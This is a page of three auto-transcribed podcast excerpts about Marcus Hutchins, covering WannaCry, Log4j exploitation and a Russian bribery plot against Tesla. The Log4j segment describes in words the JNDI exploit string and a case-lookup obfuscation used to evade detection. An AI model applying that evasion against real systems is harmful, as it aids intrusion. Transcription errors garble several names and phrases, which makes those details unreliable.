3 Burst results for "Marcus Hutchins"
WBUR
"marcus hutchins" Discussed on WBUR
"Voice you heard was Marcus Hutchins who as the news report said brought the chaos to a halt His story is a complex one there He was an expert in malware but he'd also created his own several years earlier He saved the day but a few months later he went to the U.S. and was arrested by the FBI and pleaded guilty to two offenses I spoke to him from his home in LA and I asked him if it felt like 5 years had really passed Honestly no it feels like a couple of years of just vanished I guess due to COVID It's not really something I think about like these days It's always been something that's in like it happened But it's not something I really think about I mean you were you were kind of a global household name for a while Did you expect that level of recognition No it kind of just felt like a dream for most of it just everything just went so out of control so fast that it almost feels like it didn't happen even today It doesn't feel like a real thing We haven't seen anything like the chaos that WannaCry caused again but the ransomware itself hasn't gone away has it Yeah so WannaCry itself is still infinitely circling the globe And we've seen major ants more attacks since but we've never seen a widespread global worm like WannaCry Do you think we will see another one I don't want to say that we won't but the catalyst that led to WannaCry was so unique and had so many different factors that I think it's quite unlikely we will see something like that again but that's not to say we won't see major widespread damage from cyberattacks just wanna cry specifically was a very unique set of circumstances Do you think that institutions like the NHS have learned their lesson do you think they're better protected now than they were I think the NHS specifically they did learn a lesson and they went and they did a lot of upgrades and they restructured a lot of things But then there are plenty of organizations who were like it missed us Like we didn't get hit by WannaCry therefore we don't really need to do anything Can I talk to you about what happened with the FBI Sure Were you shocked when you were arrested I wouldn't say I was shocked I always knew that that was likely a thing that would come back to bite me I was just shocked that it took so long Did you feel like you'd sort of redeemed yourself by saving the world after that Honestly no but no I didn't personally feel like it was undeserved because I had done this good thing Do you regret that now The malware I mean I regretted it Pretty much Immediately after I did it I fully take responsibility for it I was young but it wasn't like I was 5 years old there was something I was old enough to probably know better What in your opinion are the biggest threats at the moment I think it's a combination of a major ransomware groups who target corporations and cyberattacks for destructive purposes and for profit being launched by governments It's a bit of a cat and mouse game isn't it Do you think that the good guys are winning I don't think it is really a game where the good guys win It's kind of always just the bad the bad guys are going to do their thing And then we can do our best to try and slow them down or stop them But when one side has to stay within the law and the other is free to do whatever it's never really a game you win Marcus Hutchins that Joe and Lisa we were really caught on the back foot by WannaCry weren't we in 2017 Yeah I mean I still remember where I was I was only just starting my kind of cybersecurity interest and I was in a car parking bath and I was doing a different story for Sky News at the time And I remember seeing these reports coming in on Twitter of hospital after hospital falling to this virus This cyberattack and I just thought to myself I didn't even know this was possible This was the first time I'd seen anything like it And it occupied my work and my brain for the next few months Yeah definitely I think for me what was kind of surprising was it had huge impact and huge media interest and kind of I guess spread horror throughout most of the world But then conversely when we look back on it after a few weeks it was actually pretty unsuccessful So certainly from a payment perspective they made some really fundamental mistakes that essentially meant money just wasn't paid into it which you normally would relate to ransomware So it's kind of a strange attack in that respect I think It caused huge scare huge horror within the population but yet was also relatively unsuccessful If that's probably why people didn't really know where it came from did that at the time people were so confused by it because it was a it looked like a criminal enterprise but it was a really bad criminal enterprise It was also out of control And I think that's something that you don't tend to see with ransomware It tends to be very nowadays moving on from WannaCry and I suppose you could argue that WannaCry sort of really revolutionized how threat actors operate You see it as quite a slick operation relatively speaking Bitcoin wallet and the unique ID for payment and all of this is all very very beautifully curated I have customer service departments now Exactly exactly And it's this sort of widespread professionalization of it The Conti leaks that happened really recently show us exactly you know if you removed the references to ransomware or to organize crime it would look like communications from any company anywhere in the world and would not surprise you And I think that's actually pretty horrifying I think And we sit here don't we all the time and go don't pay the ransom don't give the criminals the money but the reality is that lots of people do because actually that is your easiest way out Yeah and there was a report by chain analysis that rose released in January of this year and they said that there had been a 300% increase in payments since 2019 So payments are going up The World Economic Forum released a risk report again this year and they said that there was 435% more ransomware attacks and it's led to this outpacing of our ability to actually defend or respond to them It's hard to know why that is because you'd think we'd be better prepared after something like WannaCry and of course after WannaCry there was not Petro attack which is the most devastating financially that we ever seen Again that was an out of control worm able ransomware like we saw with WannaCry Luckily no one was harmed in that sense and WannaCry is the only time really that we've seen a massive cyberattack that's really impacted people in sort of healthcare but you'd think after all these events would be a bit better prepared but there are still companies falling victim all the time because I think the ransomware crews are now as Lisa says so well organized and so targeted in their work they can spend and invest months of time gaining access into a big organization's network And then what we're also seeing is if there was a an unwillingness to pay maybe a year ago because maybe the companies don't want to and they've got better backups What we're now seeing of course is ransomware crews are spending even more time digging through the documents the emails the pictures even of these corporate networks And digging out some dirt and saying look not only will you need to pay us to get your data back but if you don't pay usable publish online So perhaps that's why we're seeing more payments We like to be.
Security Now
"marcus hutchins" Discussed on Security Now
"J and DI, which refers to the Java naming and directory interface following this, the protocol, such as ldap, ldap S RMI, DNS, II IOP, or HTTP, precedes the attacker domain. As security teams work to detect the exploitation of the vulnerability, attackers, not surprisingly, have added obfuscation to these requests to evade and I'll put in my own comments. Simple minded detection to evade detections based on request patterns. Microsoft wrote we've seen things like running a lower or upper Java command within the exploitation string. So for example, open curly J and DI colon and instead of saying just LD AP, they'll do dollar open curly, lower L close curly, dollar open curly, lower colon D in order to break up the simple text pattern. So that simple matching will not be able to see ldap there. And they said an even more complicated obfuscation attempts and then there's another example of crazy stuff that are all trying to bypass string matching detections. At the time of the publication, they said the vast majority of observed activity has been scanning, but exploitation and post exploitation activities have also been observed. And that's absolutely the case. I didn't go into it because. There's too much. I wouldn't even know what to talk about. There's just so much happening right now. They said, based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities, including installing installing coin mining, cobalt strike beacons, two of which we talked about a couple weeks ago to enable credential theft and lateral movement and exfiltrating data from compromised systems. It is a free for all right now. On Saturday, December 11th, Cloudflare's CEO, Matthew prince tweeted, quote, earliest evidence we've found so far of log for J exploit is 2021 1201. And then a time UTC. He says that suggests it was in the wild at least 9 days before being publicly disclosed. However, we don't see evidence of mass exploitation until after public disclosure. So it was being used selectively until everyone knew about it, then it was get in there before they patch. And on Sunday, day before yesterday, Marcus Hutchins tweeted cryptos logics, log for J, scanner, discovered more than 10,000 vulnerable hosts using simple HTTP header probing. That was he tweeted on the 12th, two days ago. Wikipedia has some additional information, first telling us a bit more about the underlying log for J framework. Wikipedia said log for J is an open-source logging framework that allows software developers to log various data within their application. This data can also include user input. It is used ubiquitously in Java applications, especially enterprise software. Originally written in 2001, it is now part of Apache logging services, a project of the Apache software foundation..
Security Now
Russian Tries to Hack Tesla
"Almost A. state-sponsored spy story we have something that really happened. And I tease this by quoting our friend Marcus hutchins twitter reaction upon learning of it just to remind everyone marcus is the well known security researcher and reformed cybercrime hacker. You know he actually reformed in his teenage years, but the FBI didn't forgive him for that and of course, as we know his future became uncertain when the FBI grabbed him. In Las Vegas is Logan Airport as he was departing or a preparing to depart for from the US for his home in the UK, following the annual black hat and DEFCON conferences. Well last Thursday. Reacting on twitter to the news of this story which had just broken marcus quite correctly observed he tweeted quote one of the benefits of cybercrime. Is Criminals don't have to expose themselves to unnecessary risk by conducting business in person. Flying into the US Jewish diction to have mel wear manually installed on a company's network is absolutely insane. Unquote. Okay. So what was all that about? A TWENTY-SEVEN-YEAR-OLD RUSSIAN NATIONAL By the name of or. Igla, rich. Crutch. Nikolov. Traveled to the US an attempted to subvert and bribe an employee working at Tesla corporations massive Nevada based gigafactory. Eager. Ultimately agreed to pay the employees one million dollars to plant malware inside Tesla's. Internal Network. The. Good news is the employees reported the offer. To his employer Tesla and then worked with the FBI to build an airtight case and to set up a sting which included having him covertly record face to face meetings. Discussing this, Russian the twenty-seven-year-old Russians proposal in their complaint which followed Egos, arrest and arraignment wit last Tuesday the prosecutors wrote. The purpose of the conspiracy was to recruit an employee of a company to Syrup Tissue, transmit malware provided by the CO conspirators into the company's computer system. EXFILTRATION data from the company's network and threatened to disclose the data online unless the company paid the CO conspirators ransom demand. The complaint said that the malware would be custom developed. Propagate through the company's network. For it to work the group said, it needed the employees to provide information about the employers, network authorizations and network procedures. Correct correct Yakubov said, the malware would be transmitted either by inserting a usb drive into a company computer or clicking on an email attachment containing malware. Ebor explained the infecting computer would have to run continuously for six to eight hours for the malware to move fully through the network. To distract network personnel, a first stage of the malware would perform a denial of service attack while a second stage performed the data exfiltration. When the complaint was initially unsealed last Tuesday the identities of all parties was still confidential being identified only as company A, and C H s one which is their abbreviation for confidential human source number one that is the employees. But last Thursday Elon Musk confirmed that yes. Indeed it was his company that was the target of this whole operation. The charging document with was filed in federal court in Nevada detailed and extensive end determined attempt to infect. Tesla's network the defendant again twenty-seven-year-old Eager E- Gore Vich. Crush Cov allegedly traveled from Russia to Nevada and then met with the unnamed employees on multiple occasions. When Eagles initial five hundred thousand dollar bid failed to clinch the deal. The defendant doubled the offer to one million dollars according to the complaint Crutch Kav wined and dined and boozed up the employees and when discussing especially sensitive details conducted conversations in cars. When FBI agents couldn't conduct physical surveillance in restaurants or bars, the employees recorded them. One meeting occurred on August seventh in a car crutch Cov had rented referring to the employees again as C. H. S. One, the prosecutors described that. Seventh meeting as follows they said during this meeting which the FBI had consensually recorded. Crutch Cov reiterated some of the details of the criminal activity previously proposed to. C.. H.. S. One. Credit Yakubov described the malware attack as he did before. Adding that the first part of the attack, a De dos would be successful for the group in quotes but the victim companies security officers would think the attack had failed. Crutch COBB A and here's some news again listed prior companies this group had targeted. Crutch. Cobb stated each of these targeted companies had a person working at those companies who installed malware on behalf of the group. To ease, C.. H. S ones concerns about getting caught. Crutch Cov claimed the oldest project the group had worked on took place three and a half years ago and the group's Co op de still worked for the company.